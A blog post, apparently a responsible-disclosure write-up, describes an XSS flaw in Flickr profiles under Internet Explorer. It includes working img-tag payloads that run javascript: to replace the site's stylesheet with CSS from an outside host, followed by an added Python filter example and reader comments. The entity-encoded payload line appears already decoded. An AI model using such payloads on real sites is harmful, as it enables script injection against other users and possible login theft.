If you are using MSIE, here is something to check out: have a look at my Flickr Profile and compare it with another profile. If you are not using MSIE, here is what you are missing: Skinning Flickr with an XSS exploit.
Updated May 27th: Flickr admins fixed this issue, so the exploit is no longer possible with MSIE. I'm such a good person sometimes :) Look at the screenshot and explanations anyway :)
The concept is the following: MSIE allows img tags with a javascript: src. For example, the following is valid in MSIE and would pop up a message box.
- <img src="javascript:alert('hello');">
Most of the time, scripts running on servers filter out this kind of trick, because it allows execution of unwanted, possibly malicious, remote code. But most of the time, scripts also don't check every possibility of XSS filter evasion (a really interesting read, a bit scary even :)
What I did here is the following:
- First, I created an extra CSS file for Flickr. OK, it's not the prettiest layout you can dream of for Flickr, but hey, I was more into the "proof of concept" :)
- Then, what I wanted to do was add the following image to my Flickr Profile:
- <img src="javascript:document.getElementsByTagName('link')[0].href='http://planetozh.com/projects/flickr_xss.css';" width="0" height="0">
This would replace the location of Flickr's CSS with mine.
- Of course, Flickr doesn't allow an image with a "javascript" source. So everything was encoded with HTML entities, since at that moment Flickr did not filter those out:
- <img src="javascript:document.getElementsByTagName('link')[0].href='http://frenchfragfactory.net/ozh/projects/flickr_xss.css';" width=0 height=0>
- And voilà
This is a harmless (and ugly, OK, I admit) example of Cross Site Scripting, which must be considered potentially harmful: here, I'm just running a bit of javascript from an image, but in some situations you could do much more evil things, especially to Microsoft Internet Explorer users (stealing login codes and passwords).
OK, I'm now warning Flickr's admins about this, or they might just kill my account :-P Done, and they fixed it.
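As an added example (not code from the original post), here is the filter gap the post describes, in Python: a filter that inspects the raw src attribute misses the entity-encoded payload, while one that decodes entities until the value is stable and allow-lists the URL scheme catches it. It goes slightly beyond the post by also handling double encoding and an entity-encoded tab inside the scheme; all sample markup and names are constructed for this example.

```python
import html
import re

# Constructed sample markup, not taken from the original post: the plain
# javascript: image the post describes, an HTML-entity-encoded variant of the
# same trick (the form the post says slipped past the filter), an entity-encoded
# tab inside the scheme, and an ordinary image that must stay allowed.
PLAIN = '<img src="javascript:alert(1)" width="0" height="0">'
ENTITY = '<img src="&#106;&#97;&#118;&#97;script:alert(1)" width=0 height=0>'
TAB_IN_SCHEME = '<img src="jav&#x09;ascript:alert(1)">'
BENIGN = '<img src="http://example.com/photo.jpg" width="500">'

# Pull the value of the first src= attribute out of an <img> tag (quoted or bare).
SRC_RE = re.compile(
    r'<img\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))', re.I)
SCHEME_RE = re.compile(r'^([a-z][a-z0-9+.-]*):')
ALLOWED_SCHEMES = {"http", "https"}


def extract_src(markup):
    m = SRC_RE.search(markup)
    if not m:
        return None
    return next(g for g in m.groups() if g is not None)


def naive_filter_blocks(markup):
    """Filter of the kind the post describes: it looks at the raw attribute
    text for a javascript: prefix, so entity-encoded letters go unnoticed."""
    src = extract_src(markup)
    return src is not None and src.strip().lower().startswith("javascript:")


def hardened_filter_blocks(markup):
    """Decode entities until the value is stable, drop the control characters
    and whitespace browsers ignore inside a scheme, then allow-list the scheme."""
    src = extract_src(markup)
    if src is None:
        return False
    decoded = html.unescape(src)
    while decoded != src:                      # handles double encoding
        src, decoded = decoded, html.unescape(decoded)
    cleaned = re.sub(r'[\x00-\x20]', '', decoded).lower()
    m = SCHEME_RE.match(cleaned)
    if m is None:
        return False                           # relative URL: no scheme to abuse
    return m.group(1) not in ALLOWED_SCHEMES
```

The allow-list approach also rejects data: and vbscript: sources, which a deny-list built around the string "javascript:" would not.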
As you did on the Flickr site, you should maybe remove these explanations, to prevent ill-intentioned people from taking advantage of them while nothing has been fixed :)
Meh… It's not the 30 guys who'll read this here that are going to keep the admins from sleeping :)
(I warned them yesterday, and it's easy to fix)
If only that were the only one!
Hello Ozh,
I am from Bangladesh. I am working with a portal as a web developer; still, my site is affected by Cross Site Scripting,
but I don't know how to solve this. I found your blog and I believe you are an expert in this sector, so I am praying you for a good solution. Please
Thanks
— fezo
Frazer » Sorry, I'm not.